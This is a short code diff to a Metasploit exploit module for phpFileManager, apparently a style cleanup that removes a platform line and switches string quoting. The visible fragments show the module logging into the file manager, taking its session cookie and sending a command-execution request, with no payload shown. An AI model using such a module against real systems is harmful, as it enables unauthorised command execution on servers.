@@ -36,7 +36,6 @@ class MetasploitModule < Msf::Exploit::Remote
                           'PayloadType' => 'cmd'
                         }
         },
-        'Platform' => %w{unix win},
         'Arch' => ARCH_CMD,
         'Targets' => [
           ['phpFileManager / Unix', { 'Platform' => 'unix' } ],
@@ -84,12 +83,12 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res.nil?
-      vprint_error("Connection timed out")
-      fail_with(Failure::Unknown, "Failed to trigger the Enter button")
+      vprint_error('Connection timed out')
+      fail_with(Failure::Unknown, 'Failed to trigger the Enter button')
     end
 
     if res && res.headers && res.code == 302
-      print_good("Logged in to the file manager")
+      print_good('Logged in to the file manager')
       cookie = res.get_cookies
       cookie
     else
@@ -109,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
     unless res && res.code == 200
-      fail_with(Failure::Unknown, "Failed to execute the command.")
+      fail_with(Failure::Unknown, 'Failed to execute the command.')
     end
     res
   end
